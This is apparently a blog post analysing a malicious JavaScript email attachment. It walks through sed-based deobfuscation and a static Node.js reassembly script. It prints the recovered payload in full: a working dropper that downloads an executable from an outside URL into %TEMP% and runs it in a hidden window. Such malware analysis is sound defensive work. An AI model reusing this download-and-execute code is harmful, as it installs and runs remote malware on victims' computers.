Deobfuscating Javascript

Today I came across some JavaScript madness inside a file that initially appears as a Word document attached to an email. Below is a sample of the madness:

var a=''; var b=''; function lq() { b = 'eval'; a += 'ADODB'; tqk(); }; function j() { b = 'eval'; a += 's.Exp'; eky(); }; function ye() { b = 'eval'; a += 'ti'; xk(); }; function rbx() { b = 'eval'; a += '357'; dke(); }; function mx() { b = 'eval'; a += 'ment'; fr(); }; function jp() { b = 'eval'; a += '+St'; rxh(); }; function uuz() { b = 'eval'; a += ' ca'; d(); };

As you can tell, little pieces of the actual code are scattered everywhere. To start deobfuscating the code I placed a line break before each function definition, so that each function sits on its own line.

sed 's/function/\nfunction/g' file.txt > newfile.txt

The above command just does a string substitution, inserting a newline before each function definition (the \n in the replacement is a GNU sed feature; BSD/macOS sed wants a literal newline there instead). Then I noticed that the variable b = 'eval' never changes, so I removed that assignment from the functions using sed once again:

sed "s/b = 'eval';//g" newfile.txt

Since the assembled code has to be executed in some fashion once all the fragments are concatenated, I looked through the code for where that happens and found the line this[b](a);. Because b is always 'eval', that line is this['eval'](a), i.e. eval(a) on the assembled string. I modified the line to read document.write(a) so the script would print the assembled string instead of executing it, and then ran the JavaScript in a sandbox.
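The same procedure can be done statically, without running any of the sample. The Node.js script below is an added example and not code from the original post: it performs the two sed steps as string replacements, then follows the call chain from the entry function to the this[b](a) sink and concatenates the a += '...' fragments in order. SAMPLE is a constructed chain in the same style as the snippet above, and the function names (splitFunctions, stripEval, parseChain, reassemble) are my own.

```javascript
// Added example, not code from the original post. It applies the post's
// procedure statically: split one function per line, drop the constant
// b = 'eval' assignment, then follow the call chain and collect the a += '...'
// fragments in order, so the assembled string is recovered without running
// any of the sample. SAMPLE is a constructed chain in the same style as the post.
const SAMPLE =
  "var a=''; var b=''; function lq() { b = 'eval'; a += 'ADODB'; tqk(); }; " +
  "function tqk() { b = 'eval'; a += '.Str'; qq(); }; " +
  "function qq() { b = 'eval'; a += 'eam'; fin(); }; " +
  "function fin() { b = 'eval'; this[b](a); }; lq();";

// Equivalent of sed 's/function/\nfunction/g': one function definition per line.
function splitFunctions(src) {
  return src.replace(/function/g, '\nfunction');
}

// Equivalent of sed "s/b = 'eval';//": the assignment never changes, so drop it.
function stripEval(src) {
  return src.replace(/b = 'eval';\s*/g, '');
}

// Parse each one-line function into { fragment, next }. `next` is null for the
// function that ends in this[b](a), which with b === 'eval' is eval(a).
function parseChain(src) {
  const re =
    /function (\w+)\(\) \{\s*(?:a \+= '([^']*)';\s*)?(?:(\w+)\(\);|this\[b\]\(a\);)\s*\}/g;
  const funcs = new Map();
  let m;
  while ((m = re.exec(src)) !== null) {
    funcs.set(m[1], { fragment: m[2] || '', next: m[3] || null });
  }
  return funcs;
}

// The entry point is the one function nobody else calls; walk from there to the
// sink, refusing to loop if the chain is cyclic or references a missing name.
function reassemble(obfuscated) {
  const funcs = parseChain(stripEval(splitFunctions(obfuscated)));
  const called = new Set([...funcs.values()].map(f => f.next).filter(Boolean));
  const entry = [...funcs.keys()].find(name => !called.has(name));
  const seen = new Set();
  let assembled = '';
  for (let cur = entry; cur && funcs.has(cur) && !seen.has(cur); cur = funcs.get(cur).next) {
    seen.add(cur);
    assembled += funcs.get(cur).fragment;
  }
  return assembled;
}

console.log(reassemble(SAMPLE)); // prints ADODB.Stream
```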

The output of the deobfuscated code came out to be the code below:

function dl(fr,fn,rn) {
  var ws = new ActiveXObject("WScript.Shell");
  // build %TEMP%\<fn>; String.fromCharCode(92) is the backslash
  var fn = ws.ExpandEnvironmentStrings("%TEMP%")+String.fromCharCode(92)+fn;
  var xo = new ActiveXObject("MSXML2.XMLHTTP");
  xo.onreadystatechange = function() {
    if (xo.readyState === 4) {
      // write the HTTP response body to disk as a binary stream
      var xa = new ActiveXObject("ADODB.Stream");
      xa.open();
      xa.type = 1;
      xa.write(xo.ResponseBody);
      xa.position = 0;
      xa.saveToFile(fn,2);
      xa.close();
    };
  };
  try {
    xo.open("GET",fr,false);
    xo.send();
    // rn > 0 means run the dropped file, hidden window, without waiting
    if (rn > 0) { ws.Run(fn,0,0); };
  } catch (er) { };
};
dl("hyyp://cancumisa.com.mx/document.php?id=<random number>&rnd=<random number>","69923439.exe",1)

The above JavaScript downloads the file at the listed URL with MSXML2.XMLHTTP, saves it into the temp directory as 69923439.exe via ADODB.Stream, and, because the last argument is 1, runs it with WScript.Shell in a hidden window. If the download fails the catch block silently swallows the error and nothing is written.

The goal of this post was to display the deobfuscation of the badness.
